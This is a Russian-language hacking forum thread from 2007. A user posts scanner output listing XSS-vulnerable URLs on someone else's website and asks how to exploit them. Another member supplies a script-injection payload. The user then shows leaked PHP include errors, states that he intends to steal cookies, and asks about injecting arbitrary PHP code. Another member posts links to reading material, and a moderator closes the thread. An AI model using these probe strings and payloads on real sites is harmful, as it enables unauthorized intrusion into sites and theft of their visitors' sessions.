Помогите разобраться с Xss

Discussion in 'Песочница' started by *.exe, 30 Mar 2007.

Thread Status:
Not open for further replies.
  1. *.exe

    *.exe Elder - Старейшина

    Joined:
    8 Jan 2007
    Messages:
    66
    Likes Received:
    11
    Reputations:
    -4
    Привет парни =)

    Помогите мне разобратся с XSS плиз

    Есть сайт ...... я его протестил прогой RPVS v1.3 она мне выдала XSS уязвимость типа:
    HTML:
    xss vulnerability : /index.php?news=6941337<a>%22%27&id=1
xss vulnerability : /all_news.php?news=6941337<a>%22%27&id=1
xss vulnerability : /index.php?news=6941337<a>%22%27
bad http code 302 /ftp_prav.php?action=6941337<a>%22%27&submit1=Согласен
xss vulnerability : /ftp_prav.php?action=6941337<a>%22%27&submit1=Согласен
bad http code 302 /ftp_prav.php?action=6941337<a>%22%27&submit2=Не+согласен
xss vulnerability : /ftp_prav.php?action=6941337<a>%22%27&submit2=Не+согласен
bad http code 302 /ftp_prav.php?action=reg&submit1=6941337<a>%22%27
bad http code 302 /ftp_prav.php?action=intro&submit2=6941337<a>%22%27
xss vulnerability : /all_news.php?news=6941337<a>%22%27
xss vulnerability : /ftp.php?op=download&file=6941337<a>%22%27&location=/pub/Linux/source
xss vulnerability : /ftp.php?op=download&file=6941337<a>%22%27&location=/pub
xss vulnerability : /ftp.php?op=download&file=6941337<a>%22%27&location=/pub/Video/Приколы
xss vulnerability : /ftp.php?op=download&file=6941337<a>%22%27&location=/pub/Video/Parkour
    Что это мне дает? что я могу с этим сделать?
     
    #1 *.exe, 30 Mar 2007
  2. n1†R0x

    n1†R0x Elder - Старейшина

    Joined:
    20 Jan 2007
    Messages:
    728
    Likes Received:
    376
    Reputations:
    235
    пример:
    первый линк, вместо
    Code:
    6941337<a>%22%27
    пишешь
    Code:
    "><script>alert(/css/)</script>
     
    #2 n1†R0x, 30 Mar 2007
    2 people like this.
  3. Zitt

    Zitt Elder - Старейшина

    Joined:
    7 May 2006
    Messages:
    736
    Likes Received:
    268
    Reputations:
    59
    Читать тут:
    http://hackzona.ru/hz.php?name=News&file=article&sid=5005
    http://www.cgisecurity.com/articles/dx27.html
    http://ha.ckers.org/xss.html
    /thread20140.html
    /thread8038.html
    (с) Robin_Hood (faq)
     
    #3 Zitt, 31 Mar 2007
  4. *.exe

    *.exe Elder - Старейшина

    Joined:
    8 Jan 2007
    Messages:
    66
    Likes Received:
    11
    Reputations:
    -4
    =) Да это мне уже понятно =)
    Я уже использовал это
    Code:
    "><script>alert(/css/)</script>
    но после этого он мне выдает следующее:
    Code:
    Warning: main(http://фылка на сайт/news/news\">.php): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /srv/www/sites/фылка на сайт/index.php on line 43
    Code:
    Warning: main(): Failed opening 'http://фылка на сайт/news/news\"><script>alert(/fuck/)</script>.php' for inclusion (include_path='.:/usr/share/php:/usr/share/pear') in /srv/www/sites/фылка на сайт/index.php on line 43
    Говорите скомуниздить куки? как это обычный сайт где нильзя оставлять сообшения =( так бы я в сообшение запихлул JS и куки спер =)
    Может тут можно как например при Php including замутить произвольный php кода в страницу? или еще чтонить можно сделать?
     
    #4 *.exe, 31 Mar 2007
  5. Koller

    Koller Elder - Старейшина

    Joined:
    25 Jul 2005
    Messages:
    402
    Likes Received:
    246
    Reputations:
    302
    Ссылки на материал по Xss тебе дали...читай на здоровье...
    Закрыто...
     
    #5 Koller, 31 Mar 2007
(You must log in or sign up to post here.)
Thread Status:
Not open for further replies.